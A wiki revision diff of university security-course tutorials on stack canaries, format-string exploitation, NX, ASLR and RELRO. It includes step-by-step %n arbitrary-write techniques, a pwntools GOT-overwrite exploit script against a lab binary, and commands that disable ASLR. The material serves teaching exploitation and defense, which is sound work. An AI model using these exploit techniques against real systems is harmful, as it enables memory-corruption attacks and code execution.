This shows you the differences between two versions of the page.
Both sides previous revision Previous revision Next revision | Previous revision | ||
session:10 [2019/07/16 00:56] Radu-Nicolae NICOLAU (78289) |
session:10 [2020/07/19 12:49] (current) |
||
---|---|---|---|
Line 1: | Line 1: | ||
- | = 0x0A: Information Leaks | + | ====== 0x09. Defense Mechanisms ====== |
- | == Slides | + | ===== Resources ===== |
- | == Resources | + | [[http:// |
- | [[https://security.cs.pub.ro/summer-school/res/ | + | Get the tasks by cloning |
- | [[https:// | ||
- | [[https:// | + | ===== Tutorials ===== |
+ | The previous sessions ([[: | ||
- | == Stack Protection (Canaries) | + | In [[: |
- | The name comes from canaries (birds) that were used by mining workers when entering mines and were affected by any deadly gases such as methane before humans were. In our case, stack canaries are used to check if a buffer overflow of a stack variable resulted in overriding | + | Next, we will introduce |
- | {{ : | + | Another defense mechanism we will discuss is **seccomp**, |
- | There are 3 main variations of this mechanism: //random//, // | + | Besides presenting these mechanisms, we are also going to take a quick look at how we can bypass them. Since these protections are ubiquitous at this time, you will have to work around them almost every time you build a binary exploit. |
- | **Random** canaries | + | <note warning> |
+ | The tasks today are designed for 32-bit executables. Make sure you compile with the '' | ||
+ | The binaries | ||
+ | </note> | ||
- | The **terminator** canaries contain string termination characters such as '' | + | ===== Tools ===== |
- | The **random XOR** canaries work by applying a XOR-based algorithm having both a random number (the canary), and the correct address as inputs. The attacker has to both obtain the random number, and apply the algorithm on the new return address before building the payload. | + | The **checksec** command-line tool is a wrapper over the functionality implemented in pwntools' |
- | <note> | + | We will use this tool throughout the session to identify which defense mechanisms are enabled for a certain binary: |
- | **crt0.o** is a set of initialization routines linked into compiled C programs, and executed before calling '' | + | <code bash> |
+ | root@kali: | ||
+ | [*] '/root/demo/nx/no_nx' | ||
+ | Arch: | ||
+ | RELRO: | ||
+ | Stack: | ||
+ | NX: NX disabled | ||
+ | PIE: PIE enabled | ||
+ | RWX: Has RWX segments | ||
+ | </ | ||
+ | |||
+ | <note warning> To get it to work in the Kali VM, you have to update pwntools to the latest version using: | ||
+ | < | ||
+ | $ pip install -U pwntools | ||
+ | </ | ||
</ | </ | ||
- | The 3 well known implementations of stack protections are: StackGuard, ProPolice, and StackShield. | ||
- | === StackGuard | + | ==== Executable Space Protection ==== |
- | The [[https:// | + | The **executable space protection** is an instance of the **principle of least privilege**, which is applied |
- | <note important> | + | The mechanism can be (and was) implemented in many different ways, the most common in Linux being: |
- | [[http:// | + | |
- | </ | + | |
- | === StackShield | + | **NX bit:** This is the easiest method, and involves an extra bit added to each page table entry that specifies if the memory page should be executable or not. This is current implementation in 64-bit processors where page table entries are 8-bytes wide. |
- | The most notable feature of StackShield, | + | **Physical Address Extension (PAE):** Besides |
- | === ProPolice | + | **Emulation: |
- | ProPolice, proposed by IBM, started from an implementation similar | + | < |
+ | This security feature gets in the way of **just-in-time (JIT)** compilers, which need to generate code at runtime, write it to memory, and then execute it. Since a JIT compiler cannot run in this kind of secured environment, | ||
- | {{ :session:propolice_stack.jpg?nolink&400 |}} | + | * Slides: [[http://www.semantiscope.com/ |
+ | * Paper: [[http:// | ||
- | < | ||
- | GCC supports 3 levels of stack smashing protection: complete, normal, and strong. The difference lies in the types of function that are protected, with the decision being made by looking at what kinds of local variables are used. Details in [[http:// | ||
</ | </ | ||
- | Let's compile a small application with GCC's stack protection. | + | There are of course other implementations in different hardening-oriented projects such as: OpenBSD [[http:// |
- | <file c ssp.c> | + | === Walk-through === |
- | void func() { | + | |
- | char buffer[1337]; | + | |
- | return; | + | |
- | } | + | |
- | int main() { | + | The Linux kernel provides support for managing memory protections in the '' |
- | func(); | + | |
- | return 0; | + | |
- | } | + | |
- | </ | + | |
- | Compile | + | <note important> |
+ | PaX has a protection option that restricts | ||
+ | </ | ||
+ | |||
+ | Let's start by deactivating ASLR, which is going to be discussed in the following section of this tutorial, and only focus on the NX protection. We can do this in two ways, as described below: | ||
+ | |||
+ | To disable ASLR system-wide we use (root access is required): | ||
<code bash> | <code bash> | ||
- | ~$ CFLAGS='-O0 -m32 -fstack-protector' | + | ~$ sudo bash -c 'echo 0 > / |
</ | </ | ||
- | The disassembled code for '' | + | To create a shell with ASLR disabled (ASLR will also be disabled |
<code bash> | <code bash> | ||
- | ~$ objdump | + | ~$ setarch $(uname |
</ | </ | ||
- | <code objdump> | + | Let's first compile an extremely simple C application: |
- | 0804841b < | + | |
- | 804841b: | + | <code c> |
- | 804841c: 89 e5 mov ebp,esp | + | int main() { |
- | | + | while (1); |
- | | + | } |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | 804843c: e8 af fe ff ff | + | |
- | 8048441: | + | |
- | 8048442: | + | |
</ | </ | ||
- | We can observe the random value being read from '' | + | <code bash> |
+ | ~$ CFLAGS='-m32 -O0' | ||
+ | </ | ||
- | <file text canary.gdb> | + | As presented in [[session: |
- | set disassembly-flavor intel | + | |
- | file ssp | + | |
- | break *0x804842a | + | |
- | commands | + | |
- | p/x $eax | + | |
- | c | + | |
- | end | + | |
- | run | + | |
- | quit | + | |
- | </ | + | |
- | Run using: | + | < |
+ | Program Headers: | ||
+ | Type | ||
+ | PHDR | ||
+ | INTERP | ||
+ | [Requesting program interpreter: | ||
+ | LOAD | ||
+ | LOAD | ||
+ | DYNAMIC | ||
+ | NOTE | ||
+ | GNU_EH_FRAME | ||
+ | GNU_STACK | ||
+ | GNU_RELRO | ||
- | <code bash> | + | |
- | ~$ gdb -x canary.gdb ssp | + | |
+ | | ||
+ | | ||
+ | | ||
+ | | ||
+ | | ||
+ | | ||
+ | | ||
+ | | ||
+ | | ||
</ | </ | ||
- | === Defeating Canaries | ||
- | This [[http:// | + | Check the '' |
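The same check can be scripted instead of read off the program header listing. The following is a minimal sketch, assuming a little-endian 32-bit ELF image; the names ''stack_is_executable'' and ''make_demo_elf'' are hypothetical helpers introduced here for illustration, and the demo image is synthetic (a bare ELF header plus one program header), not a real binary.

```python
import struct

PT_GNU_STACK = 0x6474E551  # program header type that carries the stack permissions
PF_X = 0x1                 # "executable" bit in p_flags


def stack_is_executable(elf_bytes):
    """Return True/False from PT_GNU_STACK of a little-endian ELF32 image, None if absent."""
    if elf_bytes[:4] != b"\x7fELF" or elf_bytes[4] != 1 or elf_bytes[5] != 1:
        raise ValueError("expected a little-endian 32-bit ELF image")
    # In the ELF32 header, e_phoff is at offset 28, e_phentsize at 42, e_phnum at 44.
    (e_phoff,) = struct.unpack_from("<I", elf_bytes, 28)
    e_phentsize, e_phnum = struct.unpack_from("<HH", elf_bytes, 42)
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        # Elf32_Phdr: p_type, p_offset, p_vaddr, p_paddr, p_filesz, p_memsz, p_flags, p_align
        p_type, _, _, _, _, _, p_flags, _ = struct.unpack_from("<8I", elf_bytes, off)
        if p_type == PT_GNU_STACK:
            return bool(p_flags & PF_X)
    return None


def make_demo_elf(stack_flags):
    """Build a synthetic ELF32 header with a single PT_GNU_STACK entry (illustration only)."""
    ident = b"\x7fELF" + bytes([1, 1, 1]) + bytes(9)
    header = ident + struct.pack("<HHIIIIIHHHHHH", 2, 3, 1, 0, 52, 0, 0, 52, 32, 1, 0, 0, 0)
    phdr = struct.pack("<8I", PT_GNU_STACK, 0, 0, 0, 0, 0, stack_flags, 16)
    return header + phdr


print("RW  stack executable?", stack_is_executable(make_demo_elf(0x6)))
print("RWE stack executable?", stack_is_executable(make_demo_elf(0x7)))
```

For a real file, the function can be fed the file contents read in binary mode; only the header and the program header table are inspected.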
- | For example, the attacker might target: | + | Next we are interested in seeing calls to '' |
- | * parameters function pointers | + | |
- | * the return address | + | |
- | * the old base pointer | + | |
- | * a plain function pointer | + | |
- | Buffers could be stored either on the stack, the heap or '' | + | <code bash> |
+ | ~$ strace -e mmap2,mprotect / | ||
+ | </ | ||
+ | |||
+ | <code text> | ||
+ | [ Process PID=11198 runs in 32 bit mode. ] | ||
+ | mmap2(0x8048000, | ||
+ | mmap2(0x8049000, | ||
+ | mmap2(NULL, 4096, PROT_READ|PROT_WRITE, | ||
+ | mmap2(NULL, 8192, PROT_READ|PROT_WRITE, | ||
+ | mmap2(NULL, 156324, PROT_READ, MAP_PRIVATE, | ||
+ | mmap2(NULL, 1763964, PROT_READ|PROT_EXEC, | ||
+ | mmap2(0xf7fcd000, | ||
+ | mmap2(0xf7fd0000, | ||
+ | mmap2(NULL, 4096, PROT_READ|PROT_WRITE, | ||
+ | mprotect(0xf7fcd000, | ||
+ | mprotect(0x8049000, | ||
+ | mprotect(0x56575000, | ||
+ | </ | ||
+ | |||
+ | We can observe a '' | ||
<note important> | <note important> | ||
- | Note that attacks can also be carried out via indirect pointers. The attacker could target | + | Note that the **stack** is not explicitly allocated by the loader. The kernel will keep increasing it each time a page fault is triggered |
</ | </ | ||
- | Besides indirect attacks, stack canaries | + | We can dump all memory mappings of the still running process as follows: |
+ | <code bash> | ||
+ | ~$ ps u | grep / | ||
+ | ... | ||
+ | ~$ cat / | ||
+ | </ | ||
- | == Format String Exploits | + | < |
- | + | Make sure to use the PID of the loader process, and not the '' | |
- | < | + | |
- | In the following, '' | + | |
- | This formality arises from this paper on [[https:// | + | |
</ | </ | ||
- | The scenario that enables format string vulnerabilities is the direct use of unsanitized user provided input as a parameter to functions that can perform special operations based on that input. | + | <code bash> |
- | Eg. | + | ~$ cat / |
+ | </ | ||
- | < | + | < |
- | void print_something(char* user_input) | + | 08048000-08049000 r-xp 00000000 00:22 5769082 |
- | { | + | 08049000-0804a000 r--p 00000000 00:22 5769082 |
- | | + | 0804a000-0804b000 rw-p 00001000 00:22 5769082 |
- | } | + | 56555000-56575000 r-xp 00000000 08:05 827365 |
+ | 56575000-56576000 r--p 0001f000 08:05 827365 | ||
+ | 56576000-56577000 rw-p 00020000 08:05 827365 | ||
+ | f7e23000-f7e24000 rw-p 00000000 00:00 0 | ||
+ | f7e24000-f7fcd000 r-xp 00000000 08:05 823395 | ||
+ | f7fcd000-f7fcf000 r--p 001a9000 08:05 823395 | ||
+ | f7fcf000-f7fd0000 rw-p 001ab000 08:05 823395 | ||
+ | f7fd0000-f7fd3000 rw-p 00000000 00:00 0 | ||
+ | f7ffa000-f7ffd000 rw-p 00000000 00:00 0 | ||
+ | f7ffd000-f7ffe000 r-xp 00000000 00:00 0 [vdso] | ||
+ | fffdd000-ffffe000 rw-p 00000000 00:00 0 [stack] | ||
</ | </ | ||
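A listing like the one above can also be checked mechanically for mappings that are both writable and executable. This is a small sketch rather than a complete tool: the helper names are made up for this example, and the sample lines are copied from the dump above with the truncated path column left out.

```python
def parse_maps_line(line):
    """Split one /proc/<pid>/maps line into (start, end, perms, name)."""
    fields = line.split()
    start, end = (int(x, 16) for x in fields[0].split("-"))
    perms = fields[1]
    name = fields[5] if len(fields) > 5 else ""
    return start, end, perms, name


def writable_and_executable(lines):
    """Return the mappings that are both writable and executable."""
    return [m for m in map(parse_maps_line, lines) if "w" in m[2] and "x" in m[2]]


# A few lines from the dump above (path column omitted where it was not shown).
SAMPLE = """\
08048000-08049000 r-xp 00000000 00:22 5769082
0804a000-0804b000 rw-p 00001000 00:22 5769082
f7ffd000-f7ffe000 r-xp 00000000 00:00 0 [vdso]
fffdd000-ffffe000 rw-p 00000000 00:00 0 [stack]
""".splitlines()

for start, end, perms, name in map(parse_maps_line, SAMPLE):
    print(f"{start:08x}-{end:08x} {perms} {name}")
print("W+X mappings:", writable_and_executable(SAMPLE))
```

With NX in effect, no mapping in the sample carries both ''w'' and ''x''; in particular the ''[stack]'' mapping is ''rw-p''.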
- | vs. | + | === Bypassing NX === |
- | <code C> | + | **ret-to-plt/libc.** You can return to the '' |
- | void print_something(char* user_input) | + | |
- | { | + | |
- | printf(" | + | |
- | } | + | |
- | </code> | + | |
- | === Format functions | + | |
- | A number of format functions are defined in the ANSI C definition. There are some basic format string | + | |
- | Real family members: | + | |
- | * fprintf — prints to a FILE stream | + | |
- | * printf — prints to the ‘stdout’ stream | + | |
- | * sprintf — prints into a string | + | |
- | * snprintf — prints into a string with length checking | + | |
- | * vfprintf — print to a FILE stream from a va_arg structure | + | |
- | * vprintf — prints to ‘stdout’ from a va_arg structure | + | |
- | * vsprintf — prints to a string from a va_arg structure | + | |
- | * vsnprintf — prints to a string with length checking from a va_arg structure | + | |
- | ===== Relatives: | + | **mprotect().** If the application is using '' |
- | * setproctitle — set argv[] | + | |
- | * syslog — output to the syslog facility | + | |
- | * others like err*, verr*, warn*, vwarn* | + | |
- | === Use of format functions === | + | **Return Oriented Programming (ROP).** This is a generalization of the ret-to-* approach that makes use of existing |
- | To understand where this vulnerability | + | |
- | == Functionality | + | ==== Address Space Layout Randomization ==== |
- | * used to convert simple C datatypes to a string representation | + | |
- | * allow to specify the format of the representation | + | |
- | * process the resulting string (output to stderr, stdout, syslog, ...) | + | |
- | == How the format function works == | + | Address Space Layout Randomization (ASLR) is a security feature that maps different memory regions |
- | * the format string controls the behaviour | + | |
- | * it specifies the type of parameters | + | |
- | * parameters are saved on the stack (pushed) | + | |
- | * saved either directly (by value), or indirectly | + | |
- | == The calling function == | + | <note important> |
- | * has to know how many parameters it pushes to the stack, since it has to do the stack correction, when the format function returns | + | Linux allows 3 options for its ASLR implementation that can be configured using the ''/ |
+ | * **0**: deactivated | ||
+ | * **1**: random | ||
+ | * **2**: random heap too | ||
- | === What exactly is a format string === | + | </note> |
- | A format string is an ASCIIZ string that contains text and format parameters. | + | |
- | Example: | + | |
- | <code C> | + | |
- | printf ("The magic number is: %d\n", 1911); | + | |
- | </ | + | |
- | The text to be printed is "The magic number is:", followed by a format parameter (" | + | |
- | < | + | |
- | Some format parameters: | + | Make sure you reactivate ASLR after the previous section of the tutorial, by one of the two options below. |
- | ^ Parameter | + | If you disabled ASLR system-wide, re-enable it using (root access is required): |
- | | %d | decimal(int) | + | |
- | | %u | unsigned decimal (unsigned int) | value | | + | |
- | | %x | hexadecimal (unsigned int) | value | | + | |
- | | %s | string ( char *) | reference | + | |
- | | %n | number of bytes written so far, (* int) | reference | + | |
- | The ' | + | < |
- | Example: | + | ~$ sudo bash -c 'echo 2 > / |
- | < | + | |
- | printf ("The magic number is: \x25d\n", | + | |
</ | </ | ||
- | The code above works, because ' | ||
- | === The stack and its role at format strings | + | If you disabled ASLR at shell level, simply **close |
- | The behaviour of the format function is controlled by the format string. The function retrieves the parameters requested by the format string from the stack. | + | |
- | <code C> | + | |
- | printf (" | + | |
- | </ | + | |
- | From within | + | We can easily demonstrate |
- | {{ : | + | |
- | The format function now parses the format string ' | + | In GDB, ASLR is disabled |
- | should be evaluated. The string " | + | |
- | === What do we control? | + | < |
- | Through supplying the format string we are able to control the behaviour of the format function. We now have to examine what exactly we are able to control, and how to use this control to extend this partial control over | + | gdb-peda$ set disable-randomization off |
- | the process to full control of the execution flow. | + | |
- | === Crash of the program | + | |
- | By utilizing format strings we can easily trigger some invalid pointer access by just supplying a format string like: | + | |
- | <code C> | + | |
- | printf (" | + | |
- | </ | + | |
- | Because ' | + | |
- | implementations offer the ' | + | |
- | === Viewing the stack | + | |
- | We can show some parts of the stack memory by using a format string like this: | + | |
- | < | + | |
- | printf (" | + | |
</ | </ | ||
- | This works, because we instruct the printf-function to retrieve five parameters from the stack and display them as 8-digit padded hexadecimal numbers. So a possible output may look like: | ||
- | < | ||
- | 40012980.080628c4.bffff7a4.00000005.08059c04 | ||
- | </ | ||
- | This is a partial dump of the stack memory, starting from the current bottom of the stack towards the top — assuming the stack grows towards the low addresses. Depending on the size of the format string buffer and the size of the output buffer, you can reconstruct more or less large parts of the stack memory by using this technique. In some cases you can even retrieve the entire stack memory. | ||
- | A stack dump gives important information about the program flow and local function variables and may be very helpful for finding the correct offsets for a successful exploitation. | ||
- | === Viewing memory at any location | ||
- | It is also possible to peek at memory locations different from the stack memory. To do this we have to get the format function to display memory from an address we can supply. | ||
- | This poses two problems to us: | ||
- | * First, we have to find a format parameter which uses an address (by reference) as stack parameter and displays memory from there | ||
- | * Secondly, we have to supply that address. | ||
- | We are lucky in the first case, since the ' | ||
- | So the remaining problem is, how to get that address on the stack, into the right place. | ||
+ | ==== Bypassing ASLR ==== | ||
- | Our format string is usually located on the stack itself, so we already have near to full control over the space where the format string lies. | + | **Bruteforce.** If you are able to inject payloads multiple times without crashing the application, you can bruteforce the address |
- | The format function internally maintains a pointer to the stack location of the current format parameter. | + | Another thing to keep in mind is that, as addresses are randomized |
- | If we would be able to get this pointer pointing into a memory space we can control, we can supply an address | + | |
- | <note important> | + | |
- | For re-creating the following attack you should place the string passed to '' | + | |
- | </ | + | |
- | To modify the stack pointer we can simply use dummy parameters that will ' | + | |
- | <code C> | + | |
- | printf (" | + | |
- | </ | + | |
- | The ' | + | |
- | After more or less of this increasing parameters the stack pointer points into our memory: the format string itself. | + | |
- | The format function always maintains the lowest stack frame, so if our buffer lies on the stack at all, it lies above the current stack pointer for sure. | + | |
- | If we choose | + | |
- | In our case the address is illegal and would be ' | + | Take the following scenario: we interact |
- | Example: | + | |
- | <code> | + | **NOP sled.** In the case of shellcodes, a longer NOP sled will maximize the chances of jumping inside it and eventually reaching the exploit |
- | address | + | |
- | address (encoded as 32 bit le string): " | + | |
- | </ | + | |
- | <code C> | + | **jmp esp.** This will basically jump into the stack, no matter where it is mapped. It's actually a very rudimentary form of Return Oriented Programming which was discussed in the previous session. |
- | printf (" | + | |
+ | **Restrict entropy.** There are various ways of reducing the entropy of the randomized address. For example, you can decrease the initial stack size by setting a large number of dummy environment variables. | ||
+ | |||
+ | **Partial overwrite.** This technique is useful when we are able to overwrite only the least significant byte(s) of an address (e.g. a GOT entry). We must take into account the offsets of the original and final addresses from the beginning of the mapping. If these offsets only differ in the last 8 bits, the exploit is deterministic, | ||
+ | <code bash> | ||
+ | gdb-peda$ p read | ||
+ | $1 = {<text variable, no debug info>} 0xe6dd0 < | ||
+ | gdb-peda$ p write | ||
+ | $2 = {<text variable, no debug info>} 0xe6ea0 < | ||
</ | </ | ||
+ | However, the offsets also differ in bits 8-9, so two bytes have to be overwritten. A two-byte overwrite also replaces bits 12-15, which are randomized, so those bits of the full address would have to be bruteforced (probability 1/16). | ||
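The bit arithmetic behind a partial overwrite can be worked through with a few lines of Python. This is only a sketch under two assumptions: the mapping is page aligned (so the low 12 bits of an address equal those of the offset), and every overwritten bit above the page offset is randomized. The function name is hypothetical; the two offsets are the ones printed by GDB above.

```python
PAGE_BITS = 12  # page-aligned mapping: the low 12 bits of an address come from the offset


def partial_overwrite_cost(old_offset, new_offset):
    """Return (bytes_to_overwrite, randomized_bits_touched) for redirecting old -> new."""
    diff = old_offset ^ new_offset
    # Smallest whole-byte overwrite that covers every differing bit.
    nbytes = max(1, (diff.bit_length() + 7) // 8)
    # Overwritten bits above the page offset depend on the randomized base.
    unknown_bits = max(0, nbytes * 8 - PAGE_BITS)
    return nbytes, unknown_bits


read_off, write_off = 0xE6DD0, 0xE6EA0  # offsets of read and write from the GDB output
nbytes, unknown = partial_overwrite_cost(read_off, write_off)
print(f"differing bits: {read_off ^ write_off:#x}")
print(f"overwrite {nbytes} byte(s); {unknown} randomized bit(s), {2 ** unknown} candidates")
```

When the second value is 0 the overwrite is deterministic; otherwise each unknown bit doubles the number of values that have to be tried.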
+ | |||
+ | **Information leak.** The most effective way of bypassing ASLR is by using an information leak vulnerability that exposes randomized addresses, or at least parts of them. You can also dump parts of libraries (e.g., '' | ||
+ | |||
+ | ==== Tutorial: Chaining Information Leaks with GOT Overwrite ==== | ||
+ | |||
+ | In this tutorial we will exploit a program that is similar to '' | ||
+ | <code c> | ||
+ | #include < | ||
+ | #include < | ||
+ | |||
+ | int main() { | ||
+ | int *addr; | ||
+ | |||
+ | printf(" | ||
+ | |||
+ | printf(" | ||
+ | scanf(" | ||
- | This will dump memory from 0x08480110 until a NULL byte is reached. By increasing the memory address dynamically we can map out the entire process space. | + | printf(" |
- | It is even possible to create a coredump like image of the remote process and to reconstruct a binary from it. It is also helpful to find the cause of unsuccessful exploitation attempts. | + | scanf(" |
- | If we cannot reach the exact format string boundary by using 4-Byte pops (' | + | sleep(10); |
- | This is analog to the alignment in buffer overflow exploits. | + | |
- | === Exploitation - through pure format strings | + | printf(" |
- | Our goal in the case of exploitation is to be able to control the instruction pointer, i.e we want to extend our very limited control — the ability to control the behaviour of the format function — to real execution control, that is executing our raw machine code. | + | |
- | Let's take a look at the following code: | + | |
- | <code C> | + | |
- | { | + | |
- | char buffer[512]; | + | |
- | snprintf (buffer, sizeof (buffer), user); | + | |
- | buffer[sizeof (buffer) - 1] = ’\0’; | + | |
} | } | ||
</ | </ | ||
- | In the code above it is not possible to enlarge our buffer by inserting some kind of ' | ||
- | At first it may look as if we cannot do much useful things, except crashing the program and inspecting some memory. | ||
- | Lets remember the format parameters mentioned. There is the '%n' | + | The goal is to alter the execution flow and avoid reaching |
- | The address of the variable is given to the format function by placing an integer pointer as parameter onto the stack. | + | |
- | Example: | + | Whenever we operate with addresses belonging |
- | < | + | < |
- | int i; | + | silvia@imladris:/ |
- | printf | + | |
- | printf | + | libc.so.6 => / |
+ | / | ||
+ | silvia@imladris:/ | ||
+ | / | ||
+ | silvia@imladris:/ | ||
+ | GNU C Library (Ubuntu GLIBC 2.27-3ubuntu1.2) stable release version 2.27. | ||
</ | </ | ||
- | Would print "i = 6". With the same method | + | |
+ | Alternatively, | ||
+ | |||
+ | For example, we have the following pair of addresses: | ||
< | < | ||
- | " | + | 0xf7df6250 < |
+ | 0xf7e780e0 < | ||
</ | </ | ||
+ | We enter them in the [[https:// | ||
- | With the '%08x' | + | For this '' |
- | We do this until this pointer points to the beginning of our format string | + | <code bash> |
- | The ' | + | silvia@imladris:/ |
- | But if we supply a correct mapped and writeable address this works and we overwrite four bytes (sizeof (int)) at the address: | + | (gdb) p printf |
- | <code> | + | $1 = {<text variable, no debug info>} 0x513a0 < |
- | " | + | (gdb) p exit |
+ | $2 = {<text variable, no debug info>} 0x30420 < | ||
</ | </ | ||
- | The format string above will overwrite four bytes at 0xbfffc8c0 with a small integer number. | + | We will also need the address |
- | We have reached one of our goals: we can write to arbitrary addresses. But we cannot control the number we are writing yet — but this will change. | + | <code bash> |
+ | silvia@imladris:/sss/demo$ objdump -d -M intel -j .plt ./ | ||
+ | 080483b0 < | ||
+ | | ||
+ | </ | ||
- | The number we are writing — the count of characters written by the format function — is dependant | + | We start the program and compute the address |
- | Since we control the format string, we can at least take influence on this counter, by writing more or less bytes: | + | < |
- | < | + | >>> |
- | int a; | + | >>> |
- | printf (" | + | >>> |
- | /* a == 10 */ | + | 4158497824 |
- | int a; | + | </code> |
- | printf (" | + | < |
- | /* a == 150 */ | + | silvia@imladris: |
+ | Here' | ||
+ | Give me and address to modify! | ||
+ | 0x804a00c | ||
+ | Give me a value! | ||
+ | 4158497824 | ||
+ | silvia@imladris: | ||
+ | 10 | ||
</ | </ | ||
- | By using a dummy parameter ' | ||
- | But for writing large numbers — such as addresses — this is not sufficient, so we have to find a way to write arbitrary data. | ||
- | An integer number on the x86 architecture is stored in four bytes, which are little-endian ordered, | + | As we intended, |
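The address computation used in this walk-through can be written down as a short worked example. It is a sketch under stated assumptions: the two offsets are the ones printed by GDB for this particular libc, the function name ''resolve_exit'' is made up for illustration, and the leaked value is hypothetical, chosen so that the result matches the number typed in the transcript above.

```python
PRINTF_OFFSET = 0x513A0  # offset of printf in this libc (from the GDB output)
EXIT_OFFSET = 0x30420    # offset of exit in this libc (from the GDB output)


def resolve_exit(printf_leak):
    """Derive the libc base from a leaked printf address and return (base, exit address)."""
    libc_base = printf_leak - PRINTF_OFFSET
    # A base that is not page aligned usually means the wrong libc version or a bad leak.
    if libc_base & 0xFFF:
        raise ValueError("libc base is not page aligned")
    return libc_base, libc_base + EXIT_OFFSET


# Hypothetical leak, picked to be consistent with the value entered in the transcript.
base, exit_addr = resolve_exit(0xF7DFB3A0)
print(hex(base), hex(exit_addr), exit_addr)
```

The page-alignment check is a cheap sanity test: with ASLR the base changes on every run, but its low 12 bits stay zero.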
- | So a number like 0x0000014c is stored in memory as: " | + | |
- | For the counter in the format function we can control the least significant byte, the first byte stored in memory by using dummy ' | + | The following pwntools script automates this interaction: |
- | Example: | + | < |
- | < | + | from pwn import |
- | unsigned char foo[4]; | + | |
- | printf (" | + | |
- | </ | + | |
- | When the printf function returns, foo[0] contains | + | p = process('./ |
+ | libc = ELF('/ | ||
- | But for an address, there are four bytes that we have to control completely. If we are unable to write four bytes at once, we can try to write a byte a time for four times in a row. | + | sleep_got = p.elf.got[' |
- | On most CISC architectures it is possible to write to unaligned arbitrary addresses. This can be used to write to the second least significant byte of the memory, where the address is stored. | + | |
- | This would look as follows: | + | |
- | <code C> | + | |
- | unsigned char canary[5]; | + | |
- | unsigned char foo[4]; | + | |
- | memset (foo, 0, sizeof (foo)); | + | |
- | /* 0 * before */ strcpy (canary, " | + | |
- | /* 1 */ printf (" | + | |
- | /* 2 */ printf (" | + | |
- | /* 3 */ printf (" | + | |
- | /* 4 */ printf (" | + | |
- | /* 5 * after */ printf (" | + | |
- | foo[2], foo[3]); | + | |
- | printf (" | + | |
- | canary[1], canary[2], canary[3]); | + | |
- | </ | + | |
- | This returns the output " | + | |
- | By increasing the pointer each time, the least significant byte moves through the memory we want to write to, and allows us to store completely arbitrary data. | + | |
- | As you can see in the first row of the following figure, all eight bytes are not touched yet by our overwrite code. | + | |
- | From the second row on we trigger four overwrites, shifted by one byte to the right for every step. | + | |
- | The last row shows the final desired state: we overwrote all four bytes of our foo array, but while doing so, we destroyed three bytes of the canary array. | + | |
- | We included the canary array just to see that we are overwriting memory we do not want to. | + | |
- | {{ : | + | |
- | Although this method looks complex, it can be used to overwrite arbitrary data at arbitrary addresses. | + | |
- | For explanation we have only used one write per format string until now, but it is also possible to write multiple times within one format string: | + | |
- | <code C> | + | |
- | strcpy (canary, " | + | |
- | printf (" | + | |
- | 1, (int *) & | + | |
- | 1, (int *) & | + | |
- | printf (" | + | |
- | foo[2], foo[3]); | + | |
- | printf (" | + | |
- | canary[1], canary[2], canary[3]); | + | |
- | </ | + | |
- | We use the '1' | + | p.recvuntil('libc address:') |
- | So we only have to add 16 characters instead of 32 to it, to get the results we desire. | + | libc_leak = int(p.recvuntil('\n')[:-1], 16) |
- | This was a special case, in which all the bytes increased throughout the writes. But we could also write '' | + | libc_base = libc_leak - libc.symbols['printf'] |
- | Since we write integer numbers and the order is little endian, only the least significant byte is important in the writes. | + | print(" |
- | By using counters of 0x80, 0x140, 0x220 and 0x310 characters respectivly when “%n” is triggered, we can construct the desired string. | + | |
- | The code to calculate the desired numberof-written-chars counter is this: | + | |
- | <code C> | + | |
- | write_byte += 0x100; | + | |
- | already_written | + | |
- | padding = (write_byte - already_written) | + | |
- | if (padding < 10) | + | |
- | padding += 0x100; | + | |
- | </ | + | |
- | Where 'write_byte' | + | exit = libc_base + libc.symbols['exit'] |
- | Example: | + | |
- | <code C> | + | |
- | write_byte = 0x7f; | + | |
- | already_written = 30; | + | |
- | write_byte += 0x100; /* write_byte is 0x17f now */ | + | |
- | already_written %= 0x100; /* already_written is 30 */ | + | |
- | /* afterwards padding is 97 (= 0x61) */ | + | p.sendline(hex(sleep_got)) |
- | padding = (write_byte - already_written) % 0x100; | + | |
- | if (padding < 10) | + | |
- | padding += 0x100; | + | |
- | </ | + | |
- | Now a format string of “%97u” would increase the ' | + | p.recvuntil('value!') |
- | The final check if the padding is below ten deserves some attention. A simple integer output, such as " | + | p.sendline(str(exit)) |
- | If the required length is larger than the padding we specify, say we want to output | + | |
- | By ensuring our padding is always larger than 10, we can keep an always accurate number of ‘already_written’, | + | |
- | === A general method to exploit format strings vulnerabilities | + | p.interactive() |
- | The only remaining thing to exploit such vulnerabilities in a hands-on practical way is to put the arguments into the right order on the stack and use a stackpop sequence to increase the stack pointer. | + | |
- | It should look like: | + | |
- | < | + | |
- | < | + | |
</ | </ | ||
- | Where: | ||
- | * **stackpop** The sequence of stack popping parameters that increase the stack pointer. Once the stackpop has been processed, the format function internal stack pointer points to the beginning of the dummy-addr-pair strings. | ||
- | * **dummy-addr-pair** Four pairs of dummy integer values and addresses to write to. The addresses are increasing by one with each pair, the dummy integer value can be anything that does not contain NULL bytes. | ||
- | * **write-code** The part of the format string that actually does the writing to the memory, by using ' | ||
- | The write code has to be modified to match the number of bytes written by the stackpop, since the stackpop wrote already characters to the output when the format function parses the write-code — the format function counter does not start at zero, and this has to be considered. | + | ==== RELRO ==== |
- | === Direct Parameter Access | + | |
- | There is a huge simplification which is known as ' | + | |
- | method to format string exploitation. | + | |
- | The direct parameter access is controlled by the ' | + | |
- | <code C> | + | |
- | printf (" | + | |
- | </ | + | |
- | Prints ' | + | **RELRO** (**Rel**ocation **R**ead-**O**nly) defends against attacks which overwrite data in relocation sections, such as the GOT-overwrite we showed earlier. |
- | <code C> | + | It comes in two flavors: partial and full. Partial RELRO protects the '' |
- | char foo[4]; | + | |
- | printf (" | + | |
- | " | + | |
- | " | + | |
- | " | + | |
- | 1, | + | |
- | | + | |
- | (int *) & | + | |
- | </ | + | |
+ | In the last session we explained how the addresses of dynamically linked functions are resolved using lazy binding. When Full RELRO is in effect, the addresses are resolved at load-time and then marked as read-only. Due to the way address space protection works, this means that the .got resides in the read-only mapping, instead | ||
+ | of the read-write mapping that contains the '' | ||
- | === Generalizing format string exploits | + | This is not a game-over in terms of exploitation, as other overwritable code pointers often exist. These can be specific to the application we want to exploit or reside in shared libraries (for example: the GOT of shared libraries that are not compiled with RELRO). The return addresses on the stack are still viable targets. |
- | The '' | + | |
- | In general, any system where user input affects program execution and data access in a custom way can be susceptible to such a vulnerability. Other specialized examples | + | |
- | * SQL injections | + | |
- | * XSS injections | + | |
- | == Tasks | + | |
